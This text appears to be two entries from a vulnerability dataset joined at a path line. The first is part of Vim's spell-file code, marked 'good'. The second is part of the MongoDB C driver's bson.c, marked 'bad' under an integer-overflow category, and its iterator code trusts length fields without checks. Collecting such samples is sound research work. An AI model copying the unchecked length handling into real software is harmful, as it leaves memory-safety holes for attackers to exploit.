if (fcount == 1 && len > 4 && STRCMP(fnames[0] + len - 4, ".add") == 0)
{
/* For ":mkspell path/en.latin1.add" output file is
* "path/en.latin1.add.spl". */
innames = &fnames[0];
incount = 1;
vim_snprintf((char *)wfname, MAXPATHL, "%s.spl", fnames[0]);
}
else if (fcount == 1)
{
/* For ":mkspell path/vim" output file is "path/vim.latin1.spl". */
innames = &fnames[0];
incount = 1;
vim_snprintf((char *)wfname, MAXPATHL, SPL_FNAME_TMPL,
fnames[0], spin.si_ascii ? (char_u *)"ascii" : spell_enc());
}
else if (len > 4 && STRCMP(fnames[0] + len - 4, ".spl") == 0)
{
/* Name ends in ".spl", use as the file name. */
vim_strncpy(wfname, fnames[0], MAXPATHL - 1);
}
else
/* Name should be language, make the file name from it. */
vim_snprintf((char *)wfname, MAXPATHL, SPL_FNAME_TMPL,
fnames[0], spin.si_ascii ? (char_u *)"ascii" : spell_enc());
/* Check for .ascii.spl. */
if (strstr((char *)gettail(wfname), SPL_FNAME_ASCII) != NULL)
spin.si_ascii = TRUE;
/* Check for .add.spl. */
if (strstr((char *)gettail(wfname), SPL_FNAME_ADD) != NULL)
spin.si_add = TRUE;
}
if (incount <= 0)
EMSG(_(e_invarg)); /* need at least output and input names */
else if (vim_strchr(gettail(wfname), '_') != NULL)
EMSG(_("E751: Output file name must not have region name"));
else if (incount > 8)
EMSG(_("E754: Only up to 8 regions supported"));
else
{
/* Check for overwriting before doing things that may take a lot of
* time. */
if (!over_write && mch_stat((char *)wfname, &st) >= 0)
{
EMSG(_(e_exists));
goto theend;
}
if (mch_isdir(wfname))
{
EMSG2(_(e_isadir2), wfname);
goto theend;
}
fname = alloc(MAXPATHL);
if (fname == NULL)
goto theend;
/*
* Init the aff and dic pointers.
* Get the region names if there are more than 2 arguments.
*/
for (i = 0; i < incount; ++i)
{
afile[i] = NULL;
if (incount > 1)
{
len = (int)STRLEN(innames[i]);
if (STRLEN(gettail(innames[i])) < 5
|| innames[i][len - 3] != '_')
{
EMSG2(_("E755: Invalid region in %s"), innames[i]);
goto theend;
}
spin.si_region_name[i * 2] = TOLOWER_ASC(innames[i][len - 2]);
spin.si_region_name[i * 2 + 1] =
TOLOWER_ASC(innames[i][len - 1]);
}
}
spin.si_region_count = incount;
spin.si_foldroot = wordtree_alloc(&spin);
spin.si_keeproot = wordtree_alloc(&spin);
spin.si_prefroot = wordtree_alloc(&spin);
if (spin.si_foldroot == NULL
|| spin.si_keeproot == NULL
|| spin.si_prefroot == NULL)
{
free_blocks(spin.si_blocks);
goto theend;
}
/* When not producing a .add.spl file clear the character table when
* we encounter one in the .aff file. This means we dump the current
* one in the .spl file if the .aff file doesn't define one. That's
* better than guessing the contents, the table will match a
* previously loaded spell file. */
if (!spin.si_add)
spin.si_clear_chartab = TRUE;
/*
* Read all the .aff and .dic files.
* Text is converted to 'encoding'.
* Words are stored in the case-folded and keep-case trees.
*/
for (i = 0; i < incount && !error; ++i)
{
spin.si_conv.vc_type = CONV_NONE;
spin.si_region = 1 << i;
vim_snprintf((char *)fname, MAXPATHL, "%s.aff", innames[i]);
if (mch_stat((char *)fname, &st) >= 0)
{
/* Read the .aff file. Will init "spin->si_conv" based on the
* "SET" line. */
afile[i] = spell_read_aff(&spin, fname);
if (afile[i] == NULL)
error = TRUE;
else
{
/* Read the .dic file and store the words in the trees. */
vim_snprintf((char *)fname, MAXPATHL, "%s.dic",
innames[i]);
if (spell_read_dic(&spin, fname, afile[i]) == FAIL)
error = TRUE;
}
}
else
{
/* No .aff file, try reading the file as a word list. Store
* the words in the trees. */
if (spell_read_wordfile(&spin, innames[i]) == FAIL)
error = TRUE;
}
#ifdef FEAT_MBYTE
/* Free any conversion stuff. */
convert_setup(&spin.si_conv, NULL, NULL);
#endif
}
if (spin.si_compflags != NULL && spin.si_nobreak)
MSG(_("Warning: both compounding and NOBREAK specified"));
if (!error && !got_int)
{
/*
* Combine tails in the tree.
*/
spell_message(&spin, (char_u *)_(msg_compressing));
wordtree_compress(&spin, spin.si_foldroot);
wordtree_compress(&spin, spin.si_keeproot);
wordtree_compress(&spin, spin.si_prefroot);
}
if (!error && !got_int)
{
/*
* Write the info in the spell file.
*/
vim_snprintf((char *)IObuff, IOSIZE,
_("Writing spell file %s ..."), wfname);
spell_message(&spin, IObuff);
error = write_vim_spell(&spin, wfname) == FAIL;
spell_message(&spin, (char_u *)_("Done!"));
vim_snprintf((char *)IObuff, IOSIZE,
_("Estimated runtime memory use: %d bytes"), spin.si_memtot);
spell_message(&spin, IObuff);
/*
* If the file is loaded need to reload it.
*/
if (!error)
spell_reload_one(wfname, added_word);
}
/* Free the allocated memory. */
ga_clear(&spin.si_rep);
ga_clear(&spin.si_repsal);
ga_clear(&spin.si_sal);
ga_clear(&spin.si_map);
ga_clear(&spin.si_comppat);
ga_clear(&spin.si_prefcond);
hash_clear_all(&spin.si_commonwords, 0);
/* Free the .aff file structures. */
for (i = 0; i < incount; ++i)
if (afile[i] != NULL)
spell_free_aff(afile[i]);
/* Free all the bits and pieces at once. */
free_blocks(spin.si_blocks);
/*
* If there is soundfolding info and no NOSUGFILE item create the
* .sug file with the soundfolded word trie.
*/
if (spin.si_sugtime != 0 && !error && !got_int)
spell_make_sugfile(&spin, wfname);
}
theend:
vim_free(fname);
vim_free(wfname);
}
/*
* Display a message for spell file processing when 'verbose' is set or using
* ":mkspell". "str" can be IObuff.
*/
static void
spell_message(spellinfo_T *spin, char_u *str)
{
if (spin->si_verbose || p_verbose > 2)
{
if (!spin->si_verbose)
verbose_enter();
MSG(str);
out_flush();
if (!spin->si_verbose)
verbose_leave();
}
}
/*
* ":[count]spellgood {word}"
* ":[count]spellwrong {word}"
* ":[count]spellundo {word}"
*/
void
ex_spell(exarg_T *eap)
{
spell_add_word(eap->arg, (int)STRLEN(eap->arg), eap->cmdidx == CMD_spellwrong,
eap->forceit ? 0 : (int)eap->line2,
eap->cmdidx == CMD_spellundo);
}
/*
* Add "word[len]" to 'spellfile' as a good or bad word.
*/
void
spell_add_word(
char_u *word,
int len,
int bad,
int idx, /* "zG" and "zW": zero, otherwise index in
'spellfile' */
int undo) /* TRUE for "zug", "zuG", "zuw" and "zuW" */
{
FILE *fd = NULL;
buf_T *buf = NULL;
int new_spf = FALSE;
char_u *fname;
char_u *fnamebuf = NULL;
char_u line[MAXWLEN * 2];
long fpos, fpos_next = 0;
int i;
char_u *spf;
if (idx == 0) /* use internal wordlist */
{
if (int_wordlist == NULL)
{
int_wordlist = vim_tempname('s', FALSE);
if (int_wordlist == NULL)
return;
}
fname = int_wordlist;
}
else
{
/* If 'spellfile' isn't set figure out a good default value. */
if (*curwin->w_s->b_p_spf == NUL)
{
init_spellfile();
new_spf = TRUE;
}
if (*curwin->w_s->b_p_spf == NUL)
{
EMSG2(_(e_notset), "spellfile");
return;
}
fnamebuf = alloc(MAXPATHL);
if (fnamebuf == NULL)
return;
for (spf = curwin->w_s->b_p_spf, i = 1; *spf != NUL; ++i)
{
copy_option_part(&spf, fnamebuf, MAXPATHL, ",");
if (i == idx)
break;
if (*spf == NUL)
{
EMSGN(_("E765: 'spellfile' does not have %ld entries"), idx);
vim_free(fnamebuf);
return;
}
}
/* Check that the user isn't editing the .add file somewhere. */
buf = buflist_findname_exp(fnamebuf);
if (buf != NULL && buf->b_ml.ml_mfp == NULL)
buf = NULL;
if (buf != NULL && bufIsChanged(buf))
{
EMSG(_(e_bufloaded));
vim_free(fnamebuf);
return;
}
fname = fnamebuf;
}
if (bad || undo)
{
/* When the word appears as good word we need to remove that one,
* since its flags sort before the one with WF_BANNED. */
fd = mch_fopen((char *)fname, "r");
if (fd != NULL)
{
while (!vim_fgets(line, MAXWLEN * 2, fd))
{
fpos = fpos_next;
fpos_next = ftell(fd);
if (STRNCMP(word, line, len) == 0
&& (line[len] == '/' || line[len] < ' '))
{
/* Found duplicate word. Remove it by writing a '#' at
* the start of the line. Mixing reading and writing
* doesn't work for all systems, close the file first. */
fclose(fd);
fd = mch_fopen((char *)fname, "r+");
if (fd == NULL)
break;
if (fseek(fd, fpos, SEEK_SET) == 0)
{
fputc('#', fd);
if (undo)
{
home_replace(NULL, fname, NameBuff, MAXPATHL, TRUE);
smsg((char_u *)_("Word '%.*s' removed from %s"),
len, word, NameBuff);
}
}
fseek(fd, fpos_next, SEEK_SET);
}
}
if (fd != NULL)
fclose(fd);
}
}
if (!undo)
{
fd = mch_fopen((char *)fname, "a");
if (fd == NULL && new_spf)
{
char_u *p;
/* We just initialized the 'spellfile' option and can't open the
* file. We may need to create the "spell" directory first. We
* already checked the runtime directory is writable in
* init_spellfile(). */
if (!dir_of_file_exists(fname) && (p = gettail_sep(fname)) != fname)
{
int c = *p;
/* The directory doesn't exist. Try creating it and opening
* the file again. */
*p = NUL;
vim_mkdir(fname, 0755);
*p = c;
fd = mch_fopen((char *)fname, "a");
}
}
if (fd == NULL)
EMSG2(_(e_notopen), fname);
else
{
if (bad)
fprintf(fd, "%.*s/!\n", len, word);
else
fprintf(fd, "%.*s\n", len, word);
fclose(fd);
home_replace(NULL, fname, NameBuff, MAXPATHL, TRUE);
smsg((char_u *)_("Word '%.*s' added to %s"), len, word, NameBuff);
}
}
if (fd != NULL)
{
/* Update the .add.spl file. */
mkspell(1, &fname, FALSE, TRUE, TRUE);
/* If the .add file is edited somewhere, reload it. */
if (buf != NULL)
buf_reload(buf, buf->b_orig_mode);
redraw_all_later(SOME_VALID);
}
vim_free(fnamebuf);
}
/*
* Initialize 'spellfile' for the current buffer.
*/
static void
init_spellfile(void)
{
char_u *buf;
int l;
char_u *fname;
char_u *rtp;
char_u *lend;
int aspath = FALSE;
char_u *lstart = curbuf->b_s.b_p_spl;
if (*curwin->w_s->b_p_spl != NUL && curwin->w_s->b_langp.ga_len > 0)
{
buf = alloc(MAXPATHL);
if (buf == NULL)
return;
/* Find the end of the language name. Exclude the region. If there
* is a path separator remember the start of the tail. */
for (lend = curwin->w_s->b_p_spl; *lend != NUL
&& vim_strchr((char_u *)",._", *lend) == NULL; ++lend)
if (vim_ispathsep(*lend))
{
aspath = TRUE;
lstart = lend + 1;
}
/* Loop over all entries in 'runtimepath'. Use the first one where we
* are allowed to write. */
rtp = p_rtp;
while (*rtp != NUL)
{
if (aspath)
/* Use directory of an entry with path, e.g., for
* "/dir/lg.utf-8.spl" use "/dir". */
vim_strncpy(buf, curbuf->b_s.b_p_spl,
lstart - curbuf->b_s.b_p_spl - 1);
else
/* Copy the path from 'runtimepath' to buf[]. */
copy_option_part(&rtp, buf, MAXPATHL, ",");
if (filewritable(buf) == 2)
{
/* Use the first language name from 'spelllang' and the
* encoding used in the first loaded .spl file. */
if (aspath)
vim_strncpy(buf, curbuf->b_s.b_p_spl,
lend - curbuf->b_s.b_p_spl);
else
{
/* Create the "spell" directory if it doesn't exist yet. */
l = (int)STRLEN(buf);
vim_snprintf((char *)buf + l, MAXPATHL - l, "/spell");
if (filewritable(buf) != 2)
vim_mkdir(buf, 0755);
l = (int)STRLEN(buf);
vim_snprintf((char *)buf + l, MAXPATHL - l,
"/%.*s", (int)(lend - lstart), lstart);
}
l = (int)STRLEN(buf);
fname = LANGP_ENTRY(curwin->w_s->b_langp, 0)
->lp_slang->sl_fname;
vim_snprintf((char *)buf + l, MAXPATHL - l, ".%s.add",
fname != NULL
&& strstr((char *)gettail(fname), ".ascii.") != NULL
? (char_u *)"ascii" : spell_enc());
set_option_value((char_u *)"spellfile", 0L, buf, OPT_LOCAL);
break;
}
aspath = FALSE;
}
vim_free(buf);
}
}
/*
* Set the spell character tables from strings in the affix file.
*/
static int
set_spell_chartab(char_u *fol, char_u *low, char_u *upp)
{
/* We build the new tables here first, so that we can compare with the
* previous one. */
spelltab_T new_st;
char_u *pf = fol, *pl = low, *pu = upp;
int f, l, u;
clear_spell_chartab(&new_st);
while (*pf != NUL)
{
if (*pl == NUL || *pu == NUL)
{
EMSG(_(e_affform));
return FAIL;
}
#ifdef FEAT_MBYTE
f = mb_ptr2char_adv(&pf);
l = mb_ptr2char_adv(&pl);
u = mb_ptr2char_adv(&pu);
#else
f = *pf++;
l = *pl++;
u = *pu++;
#endif
/* Every character that appears is a word character. */
if (f < 256)
new_st.st_isw[f] = TRUE;
if (l < 256)
new_st.st_isw[l] = TRUE;
if (u < 256)
new_st.st_isw[u] = TRUE;
/* if "LOW" and "FOL" are not the same the "LOW" char needs
* case-folding */
if (l < 256 && l != f)
{
if (f >= 256)
{
EMSG(_(e_affrange));
return FAIL;
}
new_st.st_fold[l] = f;
}
/* if "UPP" and "FOL" are not the same the "UPP" char needs
* case-folding, it's upper case and the "UPP" is the upper case of
* "FOL" . */
if (u < 256 && u != f)
{
if (f >= 256)
{
EMSG(_(e_affrange));
return FAIL;
}
new_st.st_fold[u] = f;
new_st.st_isu[u] = TRUE;
new_st.st_upper[f] = u;
}
}
if (*pl != NUL || *pu != NUL)
{
EMSG(_(e_affform));
return FAIL;
}
return set_spell_finish(&new_st);
}
/*
* Set the spell character tables from strings in the .spl file.
*/
static void
set_spell_charflags(
char_u *flags,
int cnt, /* length of "flags" */
char_u *fol)
{
/* We build the new tables here first, so that we can compare with the
* previous one. */
spelltab_T new_st;
int i;
char_u *p = fol;
int c;
clear_spell_chartab(&new_st);
for (i = 0; i < 128; ++i)
{
if (i < cnt)
{
new_st.st_isw[i + 128] = (flags[i] & CF_WORD) != 0;
new_st.st_isu[i + 128] = (flags[i] & CF_UPPER) != 0;
}
if (*p != NUL)
{
#ifdef FEAT_MBYTE
c = mb_ptr2char_adv(&p);
#else
c = *p++;
#endif
new_st.st_fold[i + 128] = c;
if (i + 128 != c && new_st.st_isu[i + 128] && c < 256)
new_st.st_upper[c] = i + 128;
}
}
(void)set_spell_finish(&new_st);
}
static int
set_spell_finish(spelltab_T *new_st)
{
int i;
if (did_set_spelltab)
{
/* check that it's the same table */
for (i = 0; i < 256; ++i)
{
if (spelltab.st_isw[i] != new_st->st_isw[i]
|| spelltab.st_isu[i] != new_st->st_isu[i]
|| spelltab.st_fold[i] != new_st->st_fold[i]
|| spelltab.st_upper[i] != new_st->st_upper[i])
{
EMSG(_("E763: Word characters differ between spell files"));
return FAIL;
}
}
}
else
{
/* copy the new spelltab into the one being used */
spelltab = *new_st;
did_set_spelltab = TRUE;
}
return OK;
}
/*
* Write the table with prefix conditions to the .spl file.
* When "fd" is NULL only count the length of what is written.
*/
static int
write_spell_prefcond(FILE *fd, garray_T *gap)
{
int i;
char_u *p;
int len;
int totlen;
size_t x = 1; /* collect return value of fwrite() */
if (fd != NULL)
put_bytes(fd, (long_u)gap->ga_len, 2); /* <prefcondcnt> */
totlen = 2 + gap->ga_len; /* length of <prefcondcnt> and <condlen> bytes */
for (i = 0; i < gap->ga_len; ++i)
{
/* <prefcond> : <condlen> <condstr> */
p = ((char_u **)gap->ga_data)[i];
if (p != NULL)
{
len = (int)STRLEN(p);
if (fd != NULL)
{
fputc(len, fd);
x &= fwrite(p, (size_t)len, (size_t)1, fd);
}
totlen += len;
}
else if (fd != NULL)
fputc(0, fd);
}
return totlen;
}
/*
* Use map string "map" for languages "lp".
*/
static void
set_map_str(slang_T *lp, char_u *map)
{
char_u *p;
int headc = 0;
int c;
int i;
if (*map == NUL)
{
lp->sl_has_map = FALSE;
return;
}
lp->sl_has_map = TRUE;
/* Init the array and hash tables empty. */
for (i = 0; i < 256; ++i)
lp->sl_map_array[i] = 0;
#ifdef FEAT_MBYTE
hash_init(&lp->sl_map_hash);
#endif
/*
* The similar characters are stored separated with slashes:
* "aaa/bbb/ccc/". Fill sl_map_array[c] with the character before c and
* before the same slash. For characters above 255 sl_map_hash is used.
*/
for (p = map; *p != NUL; )
{
#ifdef FEAT_MBYTE
c = mb_cptr2char_adv(&p);
#else
c = *p++;
#endif
if (c == '/')
headc = 0;
else
{
if (headc == 0)
headc = c;
#ifdef FEAT_MBYTE
/* Characters above 255 don't fit in sl_map_array[], put them in
* the hash table. Each entry is the char, a NUL the headchar and
* a NUL. */
if (c >= 256)
{
int cl = mb_char2len(c);
int headcl = mb_char2len(headc);
char_u *b;
hash_T hash;
hashitem_T *hi;
b = alloc((unsigned)(cl + headcl + 2));
if (b == NULL)
return;
mb_char2bytes(c, b);
b[cl] = NUL;
mb_char2bytes(headc, b + cl + 1);
b[cl + 1 + headcl] = NUL;
hash = hash_hash(b);
hi = hash_lookup(&lp->sl_map_hash, b, hash);
if (HASHITEM_EMPTY(hi))
hash_add_item(&lp->sl_map_hash, hi, b, hash);
else
{
/* This should have been checked when generating the .spl
* file. */
EMSG(_("E783: duplicate char in MAP entry"));
vim_free(b);
}
}
else
#endif
lp->sl_map_array[c] = headc;
}
}
}
#endif /* FEAT_SPELL */
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_3153_0 |
crossvul-cpp_data_bad_3983_1 | /* bson.c */
/* Copyright 2009, 2010 10gen Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <time.h>
#include <limits.h>
#include "bson.h"
#include "encoding.h"
const int initialBufferSize = 128;
/* only need one of these */
static const int zero = 0;
/* Custom standard function pointers. */
void *( *bson_malloc_func )( size_t ) = malloc;
void *( *bson_realloc_func )( void *, size_t ) = realloc;
void ( *bson_free_func )( void * ) = free;
#ifdef R_SAFETY_NET
bson_printf_func bson_printf;
#else
bson_printf_func bson_printf = printf;
#endif
bson_fprintf_func bson_fprintf = fprintf;
bson_sprintf_func bson_sprintf = sprintf;
static int _bson_errprintf( const char *, ... );
bson_printf_func bson_errprintf = _bson_errprintf;
/* ObjectId fuzz functions. */
static int ( *oid_fuzz_func )( void ) = NULL;
static int ( *oid_inc_func )( void ) = NULL;
/* ----------------------------
READING
------------------------------ */
MONGO_EXPORT bson* bson_create( void ) {
return (bson*)bson_malloc(sizeof(bson));
}
MONGO_EXPORT void bson_dispose(bson* b) {
bson_free(b);
}
MONGO_EXPORT bson *bson_empty( bson *obj ) {
static char *data = "\005\0\0\0\0";
bson_init_data( obj, data );
obj->finished = 1;
obj->err = 0;
obj->errstr = NULL;
obj->stackPos = 0;
return obj;
}
MONGO_EXPORT int bson_copy( bson *out, const bson *in ) {
if ( !out || !in ) return BSON_ERROR;
if ( !in->finished ) return BSON_ERROR;
bson_init_size( out, bson_size( in ) );
memcpy( out->data, in->data, bson_size( in ) );
out->finished = 1;
return BSON_OK;
}
int bson_init_data( bson *b, char *data ) {
b->data = data;
return BSON_OK;
}
int bson_init_finished_data( bson *b, char *data ) {
bson_init_data( b, data );
b->finished = 1;
return BSON_OK;
}
static void _bson_reset( bson *b ) {
b->finished = 0;
b->stackPos = 0;
b->err = 0;
b->errstr = NULL;
}
MONGO_EXPORT int bson_size( const bson *b ) {
int i;
if ( ! b || ! b->data )
return 0;
bson_little_endian32( &i, b->data );
return i;
}
MONGO_EXPORT int bson_buffer_size( const bson *b ) {
return (b->cur - b->data + 1);
}
MONGO_EXPORT const char *bson_data( const bson *b ) {
return (const char *)b->data;
}
static char hexbyte( char hex ) {
if (hex >= '0' && hex <= '9')
return (hex - '0');
else if (hex >= 'A' && hex <= 'F')
return (hex - 'A' + 10);
else if (hex >= 'a' && hex <= 'f')
return (hex - 'a' + 10);
else
return 0x0;
}
MONGO_EXPORT void bson_oid_from_string( bson_oid_t *oid, const char *str ) {
int i;
for ( i=0; i<12; i++ ) {
oid->bytes[i] = ( hexbyte( str[2*i] ) << 4 ) | hexbyte( str[2*i + 1] );
}
}
MONGO_EXPORT void bson_oid_to_string( const bson_oid_t *oid, char *str ) {
static const char hex[16] = {'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'};
int i;
for ( i=0; i<12; i++ ) {
str[2*i] = hex[( oid->bytes[i] & 0xf0 ) >> 4];
str[2*i + 1] = hex[ oid->bytes[i] & 0x0f ];
}
str[24] = '\0';
}
MONGO_EXPORT void bson_set_oid_fuzz( int ( *func )( void ) ) {
oid_fuzz_func = func;
}
MONGO_EXPORT void bson_set_oid_inc( int ( *func )( void ) ) {
oid_inc_func = func;
}
MONGO_EXPORT void bson_oid_gen( bson_oid_t *oid ) {
static int incr = 0;
static int fuzz = 0;
int i;
time_t t = time( NULL );
if( oid_inc_func )
i = oid_inc_func();
else
i = incr++;
if ( !fuzz ) {
if ( oid_fuzz_func )
fuzz = oid_fuzz_func();
else {
srand( ( int )t );
fuzz = rand();
}
}
bson_big_endian32( &oid->ints[0], &t );
oid->ints[1] = fuzz;
bson_big_endian32( &oid->ints[2], &i );
}
MONGO_EXPORT time_t bson_oid_generated_time( bson_oid_t *oid ) {
time_t out;
bson_big_endian32( &out, &oid->ints[0] );
return out;
}
MONGO_EXPORT void bson_print( const bson *b ) {
bson_print_raw( b->data , 0 );
}
MONGO_EXPORT void bson_print_raw( const char *data , int depth ) {
bson_iterator i;
const char *key;
int temp;
bson_timestamp_t ts;
char oidhex[25];
bson scope;
bson_iterator_from_buffer( &i, data );
while ( bson_iterator_next( &i ) ) {
bson_type t = bson_iterator_type( &i );
if ( t == 0 )
break;
key = bson_iterator_key( &i );
for ( temp=0; temp<=depth; temp++ )
bson_printf( "\t" );
bson_printf( "%s : %d \t " , key , t );
switch ( t ) {
case BSON_DOUBLE:
bson_printf( "%f" , bson_iterator_double( &i ) );
break;
case BSON_STRING:
bson_printf( "%s" , bson_iterator_string( &i ) );
break;
case BSON_SYMBOL:
bson_printf( "SYMBOL: %s" , bson_iterator_string( &i ) );
break;
case BSON_OID:
bson_oid_to_string( bson_iterator_oid( &i ), oidhex );
bson_printf( "%s" , oidhex );
break;
case BSON_BOOL:
bson_printf( "%s" , bson_iterator_bool( &i ) ? "true" : "false" );
break;
case BSON_DATE:
bson_printf( "%ld" , ( long int )bson_iterator_date( &i ) );
break;
case BSON_BINDATA:
bson_printf( "BSON_BINDATA" );
break;
case BSON_UNDEFINED:
bson_printf( "BSON_UNDEFINED" );
break;
case BSON_NULL:
bson_printf( "BSON_NULL" );
break;
case BSON_REGEX:
bson_printf( "BSON_REGEX: %s", bson_iterator_regex( &i ) );
break;
case BSON_CODE:
bson_printf( "BSON_CODE: %s", bson_iterator_code( &i ) );
break;
case BSON_CODEWSCOPE:
bson_printf( "BSON_CODE_W_SCOPE: %s", bson_iterator_code( &i ) );
/* bson_init( &scope ); */ /* review - stepped on by bson_iterator_code_scope? */
bson_iterator_code_scope( &i, &scope );
bson_printf( "\n\t SCOPE: " );
bson_print( &scope );
/* bson_destroy( &scope ); */ /* review - causes free error */
break;
case BSON_INT:
bson_printf( "%d" , bson_iterator_int( &i ) );
break;
case BSON_LONG:
bson_printf( "%lld" , ( uint64_t )bson_iterator_long( &i ) );
break;
case BSON_TIMESTAMP:
ts = bson_iterator_timestamp( &i );
bson_printf( "i: %d, t: %d", ts.i, ts.t );
break;
case BSON_OBJECT:
case BSON_ARRAY:
bson_printf( "\n" );
bson_print_raw( bson_iterator_value( &i ) , depth + 1 );
break;
default:
bson_errprintf( "can't print type : %d\n" , t );
}
bson_printf( "\n" );
}
}
/* ----------------------------
ITERATOR
------------------------------ */
MONGO_EXPORT bson_iterator* bson_iterator_create( void ) {
return ( bson_iterator* )malloc( sizeof( bson_iterator ) );
}
MONGO_EXPORT void bson_iterator_dispose(bson_iterator* i) {
free(i);
}
MONGO_EXPORT void bson_iterator_init( bson_iterator *i, const bson *b ) {
i->cur = b->data + 4;
i->first = 1;
}
MONGO_EXPORT void bson_iterator_from_buffer( bson_iterator *i, const char *buffer ) {
i->cur = buffer + 4;
i->first = 1;
}
MONGO_EXPORT bson_type bson_find( bson_iterator *it, const bson *obj, const char *name ) {
bson_iterator_init( it, (bson *)obj );
while( bson_iterator_next( it ) ) {
if ( strcmp( name, bson_iterator_key( it ) ) == 0 )
break;
}
return bson_iterator_type( it );
}
MONGO_EXPORT bson_bool_t bson_iterator_more( const bson_iterator *i ) {
return *( i->cur );
}
MONGO_EXPORT bson_type bson_iterator_next( bson_iterator *i ) {
int ds;
if ( i->first ) {
i->first = 0;
return ( bson_type )( *i->cur );
}
switch ( bson_iterator_type( i ) ) {
case BSON_EOO:
return BSON_EOO; /* don't advance */
case BSON_UNDEFINED:
case BSON_NULL:
ds = 0;
break;
case BSON_BOOL:
ds = 1;
break;
case BSON_INT:
ds = 4;
break;
case BSON_LONG:
case BSON_DOUBLE:
case BSON_TIMESTAMP:
case BSON_DATE:
ds = 8;
break;
case BSON_OID:
ds = 12;
break;
case BSON_STRING:
case BSON_SYMBOL:
case BSON_CODE:
ds = 4 + bson_iterator_int_raw( i );
break;
case BSON_BINDATA:
ds = 5 + bson_iterator_int_raw( i );
break;
case BSON_OBJECT:
case BSON_ARRAY:
case BSON_CODEWSCOPE:
ds = bson_iterator_int_raw( i );
break;
case BSON_DBREF:
ds = 4+12 + bson_iterator_int_raw( i );
break;
case BSON_REGEX: {
const char *s = bson_iterator_value( i );
const char *p = s;
p += strlen( p )+1;
p += strlen( p )+1;
ds = p-s;
break;
}
default: {
char msg[] = "unknown type: 000000000000";
bson_numstr( msg+14, ( unsigned )( i->cur[0] ) );
bson_fatal_msg( 0, msg );
return 0;
}
}
i->cur += 1 + strlen( i->cur + 1 ) + 1 + ds;
return ( bson_type )( *i->cur );
}
MONGO_EXPORT bson_type bson_iterator_type( const bson_iterator *i ) {
return ( bson_type )i->cur[0];
}
MONGO_EXPORT const char *bson_iterator_key( const bson_iterator *i ) {
return i->cur + 1;
}
MONGO_EXPORT const char *bson_iterator_value( const bson_iterator *i ) {
const char *t = i->cur + 1;
t += strlen( t ) + 1;
return t;
}
/* types */
int bson_iterator_int_raw( const bson_iterator *i ) {
int out;
bson_little_endian32( &out, bson_iterator_value( i ) );
return out;
}
double bson_iterator_double_raw( const bson_iterator *i ) {
double out;
bson_little_endian64( &out, bson_iterator_value( i ) );
return out;
}
int64_t bson_iterator_long_raw( const bson_iterator *i ) {
int64_t out;
bson_little_endian64( &out, bson_iterator_value( i ) );
return out;
}
bson_bool_t bson_iterator_bool_raw( const bson_iterator *i ) {
return bson_iterator_value( i )[0];
}
MONGO_EXPORT bson_oid_t *bson_iterator_oid( const bson_iterator *i ) {
return ( bson_oid_t * )bson_iterator_value( i );
}
MONGO_EXPORT int bson_iterator_int( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_INT:
return bson_iterator_int_raw( i );
case BSON_LONG:
return bson_iterator_long_raw( i );
case BSON_DOUBLE:
return bson_iterator_double_raw( i );
default:
return 0;
}
}
MONGO_EXPORT double bson_iterator_double( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_INT:
return bson_iterator_int_raw( i );
case BSON_LONG:
return bson_iterator_long_raw( i );
case BSON_DOUBLE:
return bson_iterator_double_raw( i );
default:
return 0;
}
}
MONGO_EXPORT int64_t bson_iterator_long( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_INT:
return bson_iterator_int_raw( i );
case BSON_LONG:
return bson_iterator_long_raw( i );
case BSON_DOUBLE:
return bson_iterator_double_raw( i );
default:
return 0;
}
}
MONGO_EXPORT bson_timestamp_t bson_iterator_timestamp( const bson_iterator *i ) {
bson_timestamp_t ts;
bson_little_endian32( &( ts.i ), bson_iterator_value( i ) );
bson_little_endian32( &( ts.t ), bson_iterator_value( i ) + 4 );
return ts;
}
MONGO_EXPORT int bson_iterator_timestamp_time( const bson_iterator *i ) {
int time;
bson_little_endian32( &time, bson_iterator_value( i ) + 4 );
return time;
}
MONGO_EXPORT int bson_iterator_timestamp_increment( const bson_iterator *i ) {
int increment;
bson_little_endian32( &increment, bson_iterator_value( i ) );
return increment;
}
MONGO_EXPORT bson_bool_t bson_iterator_bool( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_BOOL:
return bson_iterator_bool_raw( i );
case BSON_INT:
return bson_iterator_int_raw( i ) != 0;
case BSON_LONG:
return bson_iterator_long_raw( i ) != 0;
case BSON_DOUBLE:
return bson_iterator_double_raw( i ) != 0;
case BSON_EOO:
case BSON_NULL:
return 0;
default:
return 1;
}
}
MONGO_EXPORT const char *bson_iterator_string( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_STRING:
case BSON_SYMBOL:
return bson_iterator_value( i ) + 4;
default:
return "";
}
}
int bson_iterator_string_len( const bson_iterator *i ) {
return bson_iterator_int_raw( i );
}
MONGO_EXPORT const char *bson_iterator_code( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_STRING:
case BSON_CODE:
return bson_iterator_value( i ) + 4;
case BSON_CODEWSCOPE:
return bson_iterator_value( i ) + 8;
default:
return NULL;
}
}
MONGO_EXPORT void bson_iterator_code_scope( const bson_iterator *i, bson *scope ) {
if ( bson_iterator_type( i ) == BSON_CODEWSCOPE ) {
int code_len;
bson_little_endian32( &code_len, bson_iterator_value( i )+4 );
bson_init_data( scope, ( void * )( bson_iterator_value( i )+8+code_len ) );
_bson_reset( scope );
scope->finished = 1;
}
else {
bson_empty( scope );
}
}
MONGO_EXPORT bson_date_t bson_iterator_date( const bson_iterator *i ) {
return bson_iterator_long_raw( i );
}
MONGO_EXPORT time_t bson_iterator_time_t( const bson_iterator *i ) {
return bson_iterator_date( i ) / 1000;
}
MONGO_EXPORT int bson_iterator_bin_len( const bson_iterator *i ) {
return ( bson_iterator_bin_type( i ) == BSON_BIN_BINARY_OLD )
